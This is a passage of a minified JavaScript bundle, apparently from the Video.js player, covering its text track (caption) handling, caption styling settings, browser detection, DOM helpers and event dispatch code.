provided");return x(this,a,b,c)},b.prototype.addRemoteTextTrack=function(a){var b=x(this,a.kind,a.label,a.language,a);return this.remoteTextTracks().addTrack_(b),{track:b}},b.prototype.removeRemoteTextTrack=function(a){this.textTracks().removeTrack_(a),this.remoteTextTracks().removeTrack_(a)},b.prototype.setPoster=function(){},b}(h["default"]);w.prototype.textTracks_;var x=function(a,b,c,d){var e=void 0===arguments[4]?{}:arguments[4],f=a.textTracks();e.kind=b,c&&(e.label=c),d&&(e.language=d),e.tech=a;var g=new j["default"](e);return f.addTrack_(g),g};w.prototype.featuresVolumeControl=!0,w.prototype.featuresFullscreenResize=!1,w.prototype.featuresPlaybackRate=!1,w.prototype.featuresProgressEvents=!1,w.prototype.featuresTimeupdateEvents=!1,w.prototype.featuresNativeTextTracks=!1,w.withSourceHandlers=function(a){a.registerSourceHandler=function(b,c){var d=a.sourceHandlers;d||(d=a.sourceHandlers=[]),void 0===c&&(c=d.length),d.splice(c,0,b)},a.selectSourceHandler=function(b){for(var c=a.sourceHandlers||[],d=void 0,e=0;e<c.length;e++)if(d=c[e].canHandleSource(b))return c[e];return null},a.canPlaySource=function(b){var c=a.selectSourceHandler(b);return c?c.canHandleSource(b):""},a.prototype.setSource=function(b){var c=a.selectSourceHandler(b);return c||(a.nativeSourceHandler?c=a.nativeSourceHandler:p["default"].error("No source hander found for the current source.")),this.disposeSourceHandler(),this.off("dispose",this.disposeSourceHandler),this.currentSource_=b,this.sourceHandler_=c.handleSource(b,this),this.on("dispose",this.disposeSourceHandler),this.originalSeekable_=this.seekable,this.seekable=function(){return this.sourceHandler_&&this.sourceHandler_.seekable?this.sourceHandler_.seekable():this.originalSeekable_.call(this)},this},a.prototype.disposeSourceHandler=function(){this.sourceHandler_&&this.sourceHandler_.dispose&&(this.sourceHandler_.dispose(),this.seekable=this.originalSeekable_)}},h["default"].registerComponent("Tech",w),h["default"].registerComponent("MediaTechController",w),c["default"]=w,b.exports=c["default"]},{"../component":52,"../tracks/text-track":107,"../tracks/text-track-list":105,"../utils/buffer.js":109,"../utils/fn.js":113,"../utils/log.js":116,"../utils/time-ranges.js":119,"global/document":1,"global/window":2}],102:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("../utils/browser.js"),f=d(e),g=a("global/document"),h=d(g),i=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){var b=this;if(f.IS_IE8){b=h["default"].createElement("custom");for(var c in i.prototype)b[c]=i.prototype[c]}return i.prototype.setCues_.call(b,a),Object.defineProperty(b,"length",{get:function(){return this.length_}}),f.IS_IE8?b:void 0});i.prototype.setCues_=function(a){var b=this.length||0,c=0,d=a.length;this.cues_=a,this.length_=a.length;var e=function(a){""+a in this||Object.defineProperty(this,""+a,{get:function(){return this.cues_[a]}})};if(d>b)for(c=b;d>c;c++)e.call(this,c)},i.prototype.getCueById=function(a){for(var b=null,c=0,d=this.length;d>c;c++){var e=this[c];if(e.id===a){b=e;break}}return b},c["default"]=i,b.exports=c["default"]},{"../utils/browser.js":108,"global/document":1}],103:[function(a,b,c){"use strict";function d(a,b){return"rgba("+parseInt(a[1]+a[1],16)+","+parseInt(a[2]+a[2],16)+","+parseInt(a[3]+a[3],16)+","+b+")"}function e(a,b,c){try{a.style[b]=c}catch(d){}}var f=function(a){return a&&a.__esModule?a:{"default":a}},g=function(a,b){if(!(a 
instanceof b))throw new TypeError("Cannot call a class as a function")},h=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var i=a("../component"),j=f(i),k=a("../menu/menu.js"),l=(f(k),a("../menu/menu-item.js")),m=(f(l),a("../menu/menu-button.js")),n=(f(m),a("../utils/fn.js")),o=f(n),p=a("global/document"),q=(f(p),a("global/window")),r=f(q),s="#222",t="#ccc",u={monospace:"monospace",sansSerif:"sans-serif",serif:"serif",monospaceSansSerif:'"Andale Mono", "Lucida Console", monospace',monospaceSerif:'"Courier New", monospace',proportionalSansSerif:"sans-serif",proportionalSerif:"serif",casual:'"Comic Sans MS", Impact, fantasy',script:'"Monotype Corsiva", cursive',smallcaps:'"Andale Mono", "Lucida Console", monospace, sans-serif'},v=function(a){function b(c,d,e){g(this,b),a.call(this,c,d,e),c.on("loadstart",o.bind(this,this.toggleDisplay)),c.on("texttrackchange",o.bind(this,this.updateDisplay)),c.ready(o.bind(this,function(){if(c.tech&&c.tech.featuresNativeTextTracks)return void this.hide();c.on("fullscreenchange",o.bind(this,this.updateDisplay));for(var a=this.options_.playerOptions.tracks||[],b=0;b<a.length;b++){var d=a[b];this.player_.addRemoteTextTrack(d)}}))}return h(b,a),b.prototype.toggleDisplay=function(){this.player_.tech&&this.player_.tech.featuresNativeTextTracks?this.hide():this.show()},b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-text-track-display"})},b.prototype.clearDisplay=function(){"function"==typeof r["default"].WebVTT&&r["default"].WebVTT.processCues(r["default"],[],this.el_)},b.prototype.updateDisplay=function(){var a=this.player_.textTracks();if(this.clearDisplay(),a)for(var b=0;b<a.length;b++){var c=a[b];"showing"===c.mode&&this.updateForTrack(c)}},b.prototype.updateForTrack=function(a){if("function"==typeof r["default"].WebVTT&&a.activeCues){for(var b=this.player_.textTrackSettings.getValues(),c=[],f=0;f<a.activeCues.length;f++)c.push(a.activeCues[f]);r["default"].WebVTT.processCues(r["default"],a.activeCues,this.el_);for(var g=c.length;g--;){var h=c[g].displayState;if(b.color&&(h.firstChild.style.color=b.color),b.textOpacity&&e(h.firstChild,"color",d(b.color||"#fff",b.textOpacity)),b.backgroundColor&&(h.firstChild.style.backgroundColor=b.backgroundColor),b.backgroundOpacity&&e(h.firstChild,"backgroundColor",d(b.backgroundColor||"#000",b.backgroundOpacity)),b.windowColor&&(b.windowOpacity?e(h,"backgroundColor",d(b.windowColor,b.windowOpacity)):h.style.backgroundColor=b.windowColor),b.edgeStyle&&("dropshadow"===b.edgeStyle?h.firstChild.style.textShadow="2px 2px 3px "+s+", 2px 2px 4px "+s+", 2px 2px 5px "+s:"raised"===b.edgeStyle?h.firstChild.style.textShadow="1px 1px "+s+", 2px 2px "+s+", 3px 3px "+s:"depressed"===b.edgeStyle?h.firstChild.style.textShadow="1px 1px "+t+", 0 1px "+t+", -1px -1px "+s+", 0 -1px "+s:"uniform"===b.edgeStyle&&(h.firstChild.style.textShadow="0 0 4px "+s+", 0 0 4px "+s+", 0 0 4px "+s+", 0 0 4px "+s)),b.fontPercent&&1!==b.fontPercent){var 
i=r["default"].parseFloat(h.style.fontSize);h.style.fontSize=i*b.fontPercent+"px",h.style.height="auto",h.style.top="auto",h.style.bottom="2px"}b.fontFamily&&"default"!==b.fontFamily&&("small-caps"===b.fontFamily?h.firstChild.style.fontVariant="small-caps":h.firstChild.style.fontFamily=u[b.fontFamily])}}},b}(j["default"]);j["default"].registerComponent("TextTrackDisplay",v),c["default"]=v,b.exports=c["default"]},{"../component":52,"../menu/menu-button.js":89,"../menu/menu-item.js":90,"../menu/menu.js":91,"../utils/fn.js":113,"global/document":1,"global/window":2}],104:[function(a,b,c){"use strict";c.__esModule=!0;var d={disabled:"disabled",hidden:"hidden",showing:"showing"},e={subtitles:"subtitles",captions:"captions",descriptions:"descriptions",chapters:"chapters",metadata:"metadata"};c.TextTrackMode=d,c.TextTrackKind=e},{}],105:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("../event-emitter"),f=d(e),g=a("../utils/fn.js"),h=d(g),i=a("../utils/browser.js"),j=d(i),k=a("global/document"),l=d(k),m=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){var b=this;if(j.IS_IE8){b=l["default"].createElement("custom");for(var c in m.prototype)b[c]=m.prototype[c]}a=a||[],b.tracks_=[],Object.defineProperty(b,"length",{get:function(){return this.tracks_.length}});for(var d=0;d<a.length;d++)b.addTrack_(a[d]);return j.IS_IE8?b:void 0});m.prototype=Object.create(f["default"].prototype),m.prototype.constructor=m,m.prototype.allowedEvents_={change:"change",addtrack:"addtrack",removetrack:"removetrack"};for(var n in m.prototype.allowedEvents_)m.prototype["on"+n]=null;m.prototype.addTrack_=function(a){var b=this.tracks_.length;""+b in this||Object.defineProperty(this,b,{get:function(){return this.tracks_[b]}}),a.addEventListener("modechange",h.bind(this,function(){this.trigger("change")})),this.tracks_.push(a),this.trigger({type:"addtrack",track:a})},m.prototype.removeTrack_=function(a){for(var b=void 0,c=0,d=this.length;d>c;c++)if(b=this[c],b===a){this.tracks_.splice(c,1);break}this.trigger({type:"removetrack",track:b})},m.prototype.getTrackById=function(a){for(var b=null,c=0,d=this.length;d>c;c++){var e=this[c];if(e.id===a){b=e;break}}return b},c["default"]=m,b.exports=c["default"]},{"../event-emitter":83,"../utils/browser.js":108,"../utils/fn.js":113,"global/document":1}],106:[function(a,b,c){"use strict";function d(a){var b=void 0;return a.selectedOptions?b=a.selectedOptions[0]:a.options&&(b=a.options[a.options.selectedIndex]),b.value}function e(a,b){if(b){var c=void 0;for(c=0;c<a.options.length;c++){var d=a.options[c];if(d.value===b)break}a.selectedIndex=c}}function f(){var a='<div class="vjs-tracksettings">\n <div class="vjs-tracksettings-colors">\n <div class="vjs-fg-color vjs-tracksetting">\n <label class="vjs-label">Foreground</label>\n <select>\n <option value="">---</option>\n <option value="#FFF">White</option>\n <option value="#000">Black</option>\n <option value="#F00">Red</option>\n <option value="#0F0">Green</option>\n <option value="#00F">Blue</option>\n <option value="#FF0">Yellow</option>\n <option value="#F0F">Magenta</option>\n <option value="#0FF">Cyan</option>\n </select>\n <span class="vjs-text-opacity vjs-opacity">\n <select>\n <option value="">---</option>\n <option value="1">Opaque</option>\n <option value="0.5">Semi-Opaque</option>\n </select>\n </span>\n </div> <!-- vjs-fg-color -->\n <div class="vjs-bg-color vjs-tracksetting">\n <label 
class="vjs-label">Background</label>\n <select>\n <option value="">---</option>\n <option value="#FFF">White</option>\n <option value="#000">Black</option>\n <option value="#F00">Red</option>\n <option value="#0F0">Green</option>\n <option value="#00F">Blue</option>\n <option value="#FF0">Yellow</option>\n <option value="#F0F">Magenta</option>\n <option value="#0FF">Cyan</option>\n </select>\n <span class="vjs-bg-opacity vjs-opacity">\n <select>\n <option value="">---</option>\n <option value="1">Opaque</option>\n <option value="0.5">Semi-Transparent</option>\n <option value="0">Transparent</option>\n </select>\n </span>\n </div> <!-- vjs-bg-color -->\n <div class="window-color vjs-tracksetting">\n <label class="vjs-label">Window</label>\n <select>\n <option value="">---</option>\n <option value="#FFF">White</option>\n <option value="#000">Black</option>\n <option value="#F00">Red</option>\n <option value="#0F0">Green</option>\n <option value="#00F">Blue</option>\n <option value="#FF0">Yellow</option>\n <option value="#F0F">Magenta</option>\n <option value="#0FF">Cyan</option>\n </select>\n <span class="vjs-window-opacity vjs-opacity">\n <select>\n <option value="">---</option>\n <option value="1">Opaque</option>\n <option value="0.5">Semi-Transparent</option>\n <option value="0">Transparent</option>\n </select>\n </span>\n </div> <!-- vjs-window-color -->\n </div> <!-- vjs-tracksettings -->\n <div class="vjs-tracksettings-font">\n <div class="vjs-font-percent vjs-tracksetting">\n <label class="vjs-label">Font Size</label>\n <select>\n <option value="0.50">50%</option>\n <option value="0.75">75%</option>\n <option value="1.00" selected>100%</option>\n <option value="1.25">125%</option>\n <option value="1.50">150%</option>\n <option value="1.75">175%</option>\n <option value="2.00">200%</option>\n <option value="3.00">300%</option>\n <option value="4.00">400%</option>\n </select>\n </div> <!-- vjs-font-percent -->\n <div class="vjs-edge-style vjs-tracksetting">\n <label class="vjs-label">Text Edge Style</label>\n <select>\n <option value="none">None</option>\n <option value="raised">Raised</option>\n <option value="depressed">Depressed</option>\n <option value="uniform">Uniform</option>\n <option value="dropshadow">Dropshadow</option>\n </select>\n </div> <!-- vjs-edge-style -->\n <div class="vjs-font-family vjs-tracksetting">\n <label class="vjs-label">Font Family</label>\n <select>\n <option value="">Default</option>\n <option value="monospaceSerif">Monospace Serif</option>\n <option value="proportionalSerif">Proportional Serif</option>\n <option value="monospaceSansSerif">Monospace Sans-Serif</option>\n <option value="proportionalSansSerif">Proportional Sans-Serif</option>\n <option value="casual">Casual</option>\n <option value="script">Script</option>\n <option value="small-caps">Small Caps</option>\n </select>\n </div> <!-- vjs-font-family -->\n </div>\n </div>\n <div class="vjs-tracksettings-controls">\n <button class="vjs-default-button">Defaults</button>\n <button class="vjs-done-button">Done</button>\n </div>';return a}var g=function(a){return a&&a.__esModule?a:{"default":a}},h=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},i=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var 
j=a("../component"),k=g(j),l=a("../utils/events.js"),m=g(l),n=a("../utils/fn.js"),o=g(n),p=a("../utils/log.js"),q=g(p),r=a("safe-json-parse/tuple"),s=g(r),t=a("global/window"),u=g(t),v=function(a){function b(c,d){h(this,b),a.call(this,c,d),this.hide(),void 0===d.persistTextTrackSettings&&(this.options_.persistTextTrackSettings=this.options_.playerOptions.persistTextTrackSettings),m.on(this.el().querySelector(".vjs-done-button"),"click",o.bind(this,function(){this.saveSettings(),this.hide()})),m.on(this.el().querySelector(".vjs-default-button"),"click",o.bind(this,function(){this.el().querySelector(".vjs-fg-color > select").selectedIndex=0,this.el().querySelector(".vjs-bg-color > select").selectedIndex=0,this.el().querySelector(".window-color > select").selectedIndex=0,this.el().querySelector(".vjs-text-opacity > select").selectedIndex=0,this.el().querySelector(".vjs-bg-opacity > select").selectedIndex=0,this.el().querySelector(".vjs-window-opacity > select").selectedIndex=0,this.el().querySelector(".vjs-edge-style select").selectedIndex=0,this.el().querySelector(".vjs-font-family select").selectedIndex=0,this.el().querySelector(".vjs-font-percent select").selectedIndex=2,this.updateDisplay()})),m.on(this.el().querySelector(".vjs-fg-color > select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".vjs-bg-color > select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".window-color > select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".vjs-text-opacity > select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".vjs-bg-opacity > select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".vjs-window-opacity > select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".vjs-font-percent select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".vjs-edge-style select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".vjs-font-family select"),"change",o.bind(this,this.updateDisplay)),this.options_.persistTextTrackSettings&&this.restoreSettings()}return i(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-caption-settings vjs-modal-overlay",innerHTML:f()})},b.prototype.getValues=function(){var a=this.el(),b=d(a.querySelector(".vjs-edge-style select")),c=d(a.querySelector(".vjs-font-family select")),e=d(a.querySelector(".vjs-fg-color > select")),f=d(a.querySelector(".vjs-text-opacity > select")),g=d(a.querySelector(".vjs-bg-color > select")),h=d(a.querySelector(".vjs-bg-opacity > select")),i=d(a.querySelector(".window-color > select")),j=d(a.querySelector(".vjs-window-opacity > select")),k=u["default"].parseFloat(d(a.querySelector(".vjs-font-percent > select"))),l={backgroundOpacity:h,textOpacity:f,windowOpacity:j,edgeStyle:b,fontFamily:c,color:e,backgroundColor:g,windowColor:i,fontPercent:k};for(var m in l)(""===l[m]||"none"===l[m]||"fontPercent"===m&&1===l[m])&&delete l[m];return l},b.prototype.setValues=function(a){var b=this.el();e(b.querySelector(".vjs-edge-style select"),a.edgeStyle),e(b.querySelector(".vjs-font-family select"),a.fontFamily),e(b.querySelector(".vjs-fg-color > select"),a.color),e(b.querySelector(".vjs-text-opacity > select"),a.textOpacity),e(b.querySelector(".vjs-bg-color > select"),a.backgroundColor),e(b.querySelector(".vjs-bg-opacity > select"),a.backgroundOpacity),e(b.querySelector(".window-color > 
select"),a.windowColor),e(b.querySelector(".vjs-window-opacity > select"),a.windowOpacity);var c=a.fontPercent;c&&(c=c.toFixed(2)),e(b.querySelector(".vjs-font-percent > select"),c)},b.prototype.restoreSettings=function(){var a=s["default"](u["default"].localStorage.getItem("vjs-text-track-settings")),b=a[0],c=a[1];b&&q["default"].error(b),c&&this.setValues(c)},b.prototype.saveSettings=function(){if(this.options_.persistTextTrackSettings){var a=this.getValues();try{Object.getOwnPropertyNames(a).length>0?u["default"].localStorage.setItem("vjs-text-track-settings",JSON.stringify(a)):u["default"].localStorage.removeItem("vjs-text-track-settings")}catch(b){}}},b.prototype.updateDisplay=function(){var a=this.player_.getChild("textTrackDisplay");a&&a.updateDisplay()},b}(k["default"]);k["default"].registerComponent("TextTrackSettings",v),c["default"]=v,b.exports=c["default"]},{"../component":52,"../utils/events.js":112,"../utils/fn.js":113,"../utils/log.js":116,"global/window":2,"safe-json-parse/tuple":49}],107:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("./text-track-cue-list"),f=d(e),g=a("../utils/fn.js"),h=d(g),i=a("../utils/guid.js"),j=d(i),k=a("../utils/browser.js"),l=d(k),m=a("./text-track-enums"),n=d(m),o=a("../utils/log.js"),p=d(o),q=a("../event-emitter"),r=d(q),s=a("global/document"),t=d(s),u=a("global/window"),v=d(u),w=a("../xhr.js"),x=d(w),y=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){var a=void 0===arguments[0]?{}:arguments[0];if(!a.tech)throw new Error("A tech was not provided.");var b=this;if(l.IS_IE8){b=t["default"].createElement("custom");for(var c in y.prototype)b[c]=y.prototype[c]}b.tech_=a.tech;var d=n.TextTrackMode[a.mode]||"disabled",e=n.TextTrackKind[a.kind]||"subtitles",g=a.label||"",i=a.language||a.srclang||"",k=a.id||"vjs_text_track_"+j.newGUID();("metadata"===e||"chapters"===e)&&(d="hidden"),b.cues_=[],b.activeCues_=[];var m=new f["default"](b.cues_),o=new f["default"](b.activeCues_),p=!1,q=h.bind(b,function(){this.activeCues,p&&(this.trigger("cuechange"),p=!1)});return"disabled"!==d&&b.tech_.on("timeupdate",q),Object.defineProperty(b,"kind",{get:function(){return e},set:Function.prototype}),Object.defineProperty(b,"label",{get:function(){return g},set:Function.prototype}),Object.defineProperty(b,"language",{get:function(){return i},set:Function.prototype}),Object.defineProperty(b,"id",{get:function(){return k},set:Function.prototype}),Object.defineProperty(b,"mode",{get:function(){return d},set:function(a){n.TextTrackMode[a]&&(d=a,"showing"===d&&this.tech_.on("timeupdate",q),this.trigger("modechange"))}}),Object.defineProperty(b,"cues",{get:function(){return this.loaded_?m:null},set:Function.prototype}),Object.defineProperty(b,"activeCues",{get:function(){if(!this.loaded_)return null;if(0===this.cues.length)return o;for(var a=this.tech_.currentTime(),b=[],c=0,d=this.cues.length;d>c;c++){var e=this.cues[c];e.startTime<=a&&e.endTime>=a?b.push(e):e.startTime===e.endTime&&e.startTime<=a&&e.startTime+.5>=a&&b.push(e)}if(p=!1,b.length!==this.activeCues_.length)p=!0;else for(var c=0;c<b.length;c++)-1===B.call(this.activeCues_,b[c])&&(p=!0);return this.activeCues_=b,o.setCues_(this.activeCues_),o},set:Function.prototype}),a.src?A(a.src,b):b.loaded_=!0,l.IS_IE8?b:void 0});y.prototype=Object.create(r["default"].prototype),y.prototype.constructor=y,y.prototype.allowedEvents_={cuechange:"cuechange"},y.prototype.addCue=function(a){var 
b=this.tech_.textTracks();if(b)for(var c=0;c<b.length;c++)b[c]!==this&&b[c].removeCue(a);this.cues_.push(a),this.cues.setCues_(this.cues_)},y.prototype.removeCue=function(a){for(var b=!1,c=0,d=this.cues_.length;d>c;c++){var e=this.cues_[c];e===a&&(this.cues_.splice(c,1),b=!0)}b&&this.cues.setCues_(this.cues_)};var z=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a,b){if("function"!=typeof v["default"].WebVTT)return v["default"].setTimeout(function(){z(a,b)},25);var c=new v["default"].WebVTT.Parser(v["default"],v["default"].vttjs,v["default"].WebVTT.StringDecoder());c.oncue=function(a){b.addCue(a)},c.onparsingerror=function(a){p["default"].error(a)},c.parse(a),c.flush()}),A=function(a,b){x["default"](a,h.bind(this,function(a,c,d){return a?p["default"].error(a):(b.loaded_=!0,void z(d,b))}))},B=function(a,b){if(null==this)throw new TypeError('"this" is null or not defined');var c=Object(this),d=c.length>>>0;if(0===d)return-1;var e=+b||0;if(Math.abs(e)===1/0&&(e=0),e>=d)return-1;for(var f=Math.max(e>=0?e:d-Math.abs(e),0);d>f;){if(f in c&&c[f]===a)return f;f++}return-1};c["default"]=y,b.exports=c["default"]},{"../event-emitter":83,"../utils/browser.js":108,"../utils/fn.js":113,"../utils/guid.js":115,"../utils/log.js":116,"../xhr.js":123,"./text-track-cue-list":102,"./text-track-enums":104,"global/document":1,"global/window":2}],108:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("global/document"),f=d(e),g=a("global/window"),h=d(g),i=h["default"].navigator.userAgent,j=/iPhone/i.test(i);c.IS_IPHONE=j;var k=/iPad/i.test(i);c.IS_IPAD=k;var l=/iPod/i.test(i);c.IS_IPOD=l;var m=j||k||l;c.IS_IOS=m;var n=function(){var a=i.match(/OS (\d+)_/i);return a&&a[1]?a[1]:void 0}();c.IOS_VERSION=n;var o=/Android/i.test(i);c.IS_ANDROID=o;var p=function(){var a,b,c=i.match(/Android (\d+)(?:\.(\d+))?(?:\.(\d+))*/i);return c?(a=c[1]&&parseFloat(c[1]),b=c[2]&&parseFloat(c[2]),a&&b?parseFloat(c[1]+"."+c[2]):a?a:null):null}();c.ANDROID_VERSION=p;var q=o&&/webkit/i.test(i)&&2.3>p;c.IS_OLD_ANDROID=q;var r=/Firefox/i.test(i);c.IS_FIREFOX=r;var s=/Chrome/i.test(i);c.IS_CHROME=s;var t=/MSIE\s8\.0/.test(i);c.IS_IE8=t;var u=!!("ontouchstart"in h["default"]||h["default"].DocumentTouch&&f["default"]instanceof h["default"].DocumentTouch);c.TOUCH_ENABLED=u;var v="backgroundSize"in f["default"].createElement("video").style;c.BACKGROUND_SIZE_SUPPORTED=v},{"global/document":1,"global/window":2}],109:[function(a,b,c){"use strict";function d(a,b){var c,d,f=0;if(!b)return 0;a&&a.length||(a=e.createTimeRange(0,0));for(var g=0;g<a.length;g++)c=a.start(g),d=a.end(g),d>b&&(d=b),f+=d-c;return f/b}c.__esModule=!0,c.bufferedPercent=d;var e=a("./time-ranges.js")},{"./time-ranges.js":119}],110:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("./log.js"),f=d(e),g={get:function(a,b){return a[b]},set:function(a,b,c){return a[b]=c,!0}};c["default"]=function(a){var b=void 0===arguments[1]?{}:arguments[1];if("function"==typeof Proxy){var c=function(){var c={};return Object.keys(b).forEach(function(a){g.hasOwnProperty(a)&&(c[a]=function(){return f["default"].warn(b[a]),g[a].apply(this,arguments)})}),{v:new Proxy(a,c)}}();if("object"==typeof c)return c.v}return a},b.exports=c["default"]},{"./log.js":116}],111:[function(a,b,c){"use strict";function d(a){return 0===a.indexOf("#")&&(a=a.slice(1)),t["default"].getElementById(a)}function e(){var a=void
0===arguments[0]?"div":arguments[0],b=void 0===arguments[1]?{}:arguments[1],c=t["default"].createElement(a);return Object.getOwnPropertyNames(b).forEach(function(a){var d=b[a];-1!==a.indexOf("aria-")||"role"===a?c.setAttribute(a,d):c[a]=d}),c}function f(a,b){b.firstChild?b.insertBefore(a,b.firstChild):b.appendChild(a)}function g(a){var b=a[B];return b||(b=a[B]=x.newGUID()),A[b]||(A[b]={}),A[b]}function h(a){var b=a[B];return b?!!Object.getOwnPropertyNames(A[b]).length:!1}function i(a){var b=a[B];if(b){delete A[b];try{delete a[B]}catch(c){a.removeAttribute?a.removeAttribute(B):a[B]=null}}}function j(a,b){return-1!==(" "+a.className+" ").indexOf(" "+b+" ")}function k(a,b){j(a,b)||(a.className=""===a.className?b:a.className+" "+b)}function l(a,b){if(j(a,b)){for(var c=a.className.split(" "),d=c.length-1;d>=0;d--)c[d]===b&&c.splice(d,1);a.className=c.join(" ")}}function m(a,b){Object.getOwnPropertyNames(b).forEach(function(c){var d=b[c];null===d||"undefined"==typeof d||d===!1?a.removeAttribute(c):a.setAttribute(c,d===!0?"":d)})}function n(a){var b,c,d,e,f;if(b={},c=",autoplay,controls,loop,muted,default,",a&&a.attributes&&a.attributes.length>0){d=a.attributes;for(var g=d.length-1;g>=0;g--)e=d[g].name,f=d[g].value,("boolean"==typeof a[e]||-1!==c.indexOf(","+e+","))&&(f=null!==f?!0:!1),b[e]=f}return b}function o(){t["default"].body.focus(),t["default"].onselectstart=function(){return!1}}function p(){t["default"].onselectstart=function(){return!0}}function q(a){var b=void 0;if(a.getBoundingClientRect&&a.parentNode&&(b=a.getBoundingClientRect()),!b)return{left:0,top:0};var c=t["default"].documentElement,d=t["default"].body,e=c.clientLeft||d.clientLeft||0,f=v["default"].pageXOffset||d.scrollLeft,g=b.left+f-e,h=c.clientTop||d.clientTop||0,i=v["default"].pageYOffset||d.scrollTop,j=b.top+i-h;return{left:z["default"](g),top:z["default"](j)}}var r=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0,c.getEl=d,c.createEl=e,c.insertElFirst=f,c.getElData=g,c.hasElData=h,c.removeElData=i,c.hasElClass=j,c.addElClass=k,c.removeElClass=l,c.setElAttributes=m,c.getElAttributes=n,c.blockTextSelection=o,c.unblockTextSelection=p,c.findElPosition=q;var s=a("global/document"),t=r(s),u=a("global/window"),v=r(u),w=a("./guid.js"),x=r(w),y=a("./round-float.js"),z=r(y),A={},B="vdata"+(new Date).getTime()},{"./guid.js":115,"./round-float.js":118,"global/document":1,"global/window":2}],112:[function(a,b,c){"use strict";function d(a,b,c){if(Array.isArray(b))return j(d,a,b,c);var e=m.getElData(a);e.handlers||(e.handlers={}),e.handlers[b]||(e.handlers[b]=[]),c.guid||(c.guid=o.newGUID()),e.handlers[b].push(c),e.dispatcher||(e.disabled=!1,e.dispatcher=function(b,c){if(!e.disabled){b=h(b);var d=e.handlers[b.type];if(d)for(var f=d.slice(0),g=0,i=f.length;i>g&&!b.isImmediatePropagationStopped();g++)f[g].call(a,b,c);
}}),1===e.handlers[b].length&&(a.addEventListener?a.addEventListener(b,e.dispatcher,!1):a.attachEvent&&a.attachEvent("on"+b,e.dispatcher))}function e(a,b,c){if(m.hasElData(a)){var d=m.getElData(a);if(d.handlers){if(Array.isArray(b))return j(e,a,b,c);var f=function(b){d.handlers[b]=[],i(a,b)};if(b){var g=d.handlers[b];if(g){if(!c)return void f(b);if(c.guid)for(var h=0;h<g.length;h++)g[h].guid===c.guid&&g.splice(h--,1);i(a,b)}}else for(var k in d.handlers)f(k)}}}function f(a,b,c){var d=m.hasElData(a)?m.getElData(a):{},e=a.parentNode||a.ownerDocument;if("string"==typeof b&&(b={type:b,target:a}),b=h(b),d.dispatcher&&d.dispatcher.call(a,b,c),e&&!b.isPropagationStopped()&&b.bubbles===!0)f.call(null,e,b,c);else if(!e&&!b.defaultPrevented){var g=m.getElData(b.target);b.target[b.type]&&(g.disabled=!0,"function"==typeof b.target[b.type]&&b.target[b.type](),g.disabled=!1)}return!b.defaultPrevented}function g(a,b,c){if(Array.isArray(b))return j(g,a,b,c);var f=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){e(a,b,f),c.apply(this,arguments)});f.guid=c.guid=c.guid||o.newGUID(),d(a,b,f)}function h(a){function b(){return!0}function c(){return!1}if(!a||!a.isPropagationStopped){var d=a||q["default"].event;a={};for(var e in d)"layerX"!==e&&"layerY"!==e&&"keyLocation"!==e&&("returnValue"===e&&d.preventDefault||(a[e]=d[e]));if(a.target||(a.target=a.srcElement||s["default"]),a.relatedTarget||(a.relatedTarget=a.fromElement===a.target?a.toElement:a.fromElement),a.preventDefault=function(){d.preventDefault&&d.preventDefault(),a.returnValue=!1,a.defaultPrevented=!0},a.defaultPrevented=!1,a.stopPropagation=function(){d.stopPropagation&&d.stopPropagation(),a.cancelBubble=!0,a.isPropagationStopped=b},a.isPropagationStopped=c,a.stopImmediatePropagation=function(){d.stopImmediatePropagation&&d.stopImmediatePropagation(),a.isImmediatePropagationStopped=b,a.stopPropagation()},a.isImmediatePropagationStopped=c,null!=a.clientX){var f=s["default"].documentElement,g=s["default"].body;a.pageX=a.clientX+(f&&f.scrollLeft||g&&g.scrollLeft||0)-(f&&f.clientLeft||g&&g.clientLeft||0),a.pageY=a.clientY+(f&&f.scrollTop||g&&g.scrollTop||0)-(f&&f.clientTop||g&&g.clientTop||0)}a.which=a.charCode||a.keyCode,null!=a.button&&(a.button=1&a.button?0:4&a.button?1:2&a.button?2:0)}return a}function i(a,b){var c=m.getElData(a);0===c.handlers[b].length&&(delete c.handlers[b],a.removeEventListener?a.removeEventListener(b,c.dispatcher,!1):a.detachEvent&&a.detachEvent("on"+b,c.dispatcher)),Object.getOwnPropertyNames(c.handlers).length<=0&&(delete c.handlers,delete c.dispatcher,delete c.disabled),0===Object.getOwnPropertyNames(c).length&&m.removeElData(a)}function 